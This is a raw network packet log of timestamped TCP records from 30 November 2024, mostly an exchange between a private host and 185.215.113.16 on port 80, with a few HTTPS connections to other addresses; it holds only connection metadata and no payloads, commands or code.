Nov 30, 2024 04:06:45.945807934 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.945868015 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.945908070 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.946701050 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.946758032 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.946809053 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.946995974 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.947669983 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.947719097 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.947784901 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.947845936 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.948640108 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.948688984 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.948743105 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.948791027 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.949584961 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.949656010 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.949697971 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.949762106 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.950531960 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.950577021 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.950644016 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.950691938 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.951530933 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.951584101 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.951625109 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.951682091 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.952476025 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.952516079 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.952563047 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.952605963 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.953418970 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.953464985 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.953528881 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.953573942 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.954377890 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.954427004 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.954467058 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.954510927 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.955364943 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.955410957 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.955465078 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.955512047 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.956334114 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.956401110 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.956439972 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.956490040 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.957269907 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.957318068 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.957367897 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.957413912 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.958216906 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.958265066 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.958323002 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.958389997 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.959177017 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.959224939 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.959278107 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.959326982 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.960135937 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.960184097 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.960259914 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.960325003 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.961113930 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.961165905 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.961205959 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.961246014 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.962075949 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.962168932 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.962171078 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.963023901 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.963128090 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.963397980 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.963998079 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.964054108 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.964102983 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.964143038 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.964945078 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.964986086 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.965068102 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.965107918 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.965928078 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.965977907 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.966047049 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.966094971 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.966867924 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.966916084 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.966974974 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.967020988 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.967843056 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.967890024 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.967952013 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.967997074 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.968811035 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.968858957 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.968900919 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.968947887 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.969749928 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.969796896 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.969857931 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.969902992 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.970735073 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.970788956 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.970838070 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.970896006 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.971693039 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.971738100 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.971744061 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.971788883 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.972677946 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.972732067 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.972784996 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.972832918 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.973611116 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.973659039 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.973721027 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.973776102 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.974586010 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.974654913 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.974692106 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.974740028 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.975549936 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.975600004 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.975665092 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.975712061 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.976512909 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.976557970 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.976627111 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.976671934 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.977446079 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.977494001 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.977550030 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.977607965 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.978424072 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.978477001 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.978502989 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.978552103 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.979360104 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.979415894 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.005388021 CET	49862	443	192.168.2.4	142.250.181.78
Nov 30, 2024 04:06:46.005451918 CET	443	49862	142.250.181.78	192.168.2.4
Nov 30, 2024 04:06:46.005580902 CET	49862	443	192.168.2.4	142.250.181.78
Nov 30, 2024 04:06:46.006974936 CET	49862	443	192.168.2.4	142.250.181.78
Nov 30, 2024 04:06:46.007009983 CET	443	49862	142.250.181.78	192.168.2.4
Nov 30, 2024 04:06:46.075932026 CET	49863	443	192.168.2.4	142.250.181.78
Nov 30, 2024 04:06:46.075952053 CET	443	49863	142.250.181.78	192.168.2.4
Nov 30, 2024 04:06:46.076785088 CET	49863	443	192.168.2.4	142.250.181.78
Nov 30, 2024 04:06:46.078402996 CET	49863	443	192.168.2.4	142.250.181.78
Nov 30, 2024 04:06:46.078418016 CET	443	49863	142.250.181.78	192.168.2.4
Nov 30, 2024 04:06:46.108405113 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.108431101 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.108722925 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.108831882 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.109658003 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.109806061 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.110635996 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.110735893 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.111150980 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.111605883 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.111658096 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.111701965 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.111751080 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.112562895 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.112610102 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.112664938 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.112730026 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.113517046 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.113678932 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.113729000 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.113764048 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.137100935 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.137186050 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.137516975 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.137630939 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.138499975 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.138607979 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.139460087 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.139569998 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.140423059 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.140539885 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.141365051 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.141468048 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.142311096 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.142430067 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.143285990 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.143397093 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.143904924 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.143922091 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.144006968 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.144274950 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.144398928 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.144653082 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.145212889 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.145256042 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.145332098 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.145380020 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.146166086 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.146215916 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.146269083 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.146320105 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.147176981 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.147263050 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.147278070 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.147331953 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.148092031 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.148137093 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.148305893 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.148355007 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.149053097 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.149106026 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.149173975 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.149247885 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.150001049 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.150053978 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.150114059 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.150152922 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.150975943 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.151024103 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.151094913 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.151149988 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.151926041 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.152055025 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.152872086 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.152983904 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.153845072 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.153966904 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.154792070 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.154917955 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.155777931 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.155822039 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.155883074 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.156059980 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.156739950 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.156794071 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.156862974 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.156912088 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.157733917 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.157812119 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.157828093 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.157845020 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.158653021 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.158701897 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.158760071 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.158811092 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.159611940 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.159666061 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.159723997 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.159775972 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.160557032 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.160595894 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.160665989 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.160794020 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.161526918 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.161578894 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.161639929 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.161721945 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.162476063 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.162595987 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.162637949 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.163431883 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.163513899 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.164405107 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.164524078 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.165359020 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.165477991 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.166336060 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.166441917 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.167272091 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.167396069 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.168284893 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.168364048 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.169213057 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.169317961 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.170164108 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.170274019 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.171127081 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.171324968 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.171351910 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.171385050 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.172077894 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.172156096 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.172192097 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.172363997 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.173041105 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.173110962 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.173146009 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.173192024 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.173996925 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.174057007 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.174114943 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.174164057 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.174952984 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.175069094 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.175081015 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.175110102 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.175923109 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.175973892 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.176023006 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.176067114 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.176894903 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.177022934 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.177042961 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.177092075 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.177845955 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.177968025 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.178011894 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.178817034 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.178895950 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.178910971 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.178936005 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.179779053 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.179884911 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.179943085 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.180701971 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.180792093 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.309592962 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.309634924 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.309669018 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.309691906 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.310013056 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.310060978 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.310127974 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.310183048 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.310971975 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.311026096 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.311065912 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.311110973 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.311894894 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.311945915 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.312067032 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.312122107 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.312868118 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.312921047 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.312988043 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.313055992 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.313822031 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.313944101 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.314788103 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.314857960 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.315068960 CET	49865	80	192.168.2.4	34.107.221.82
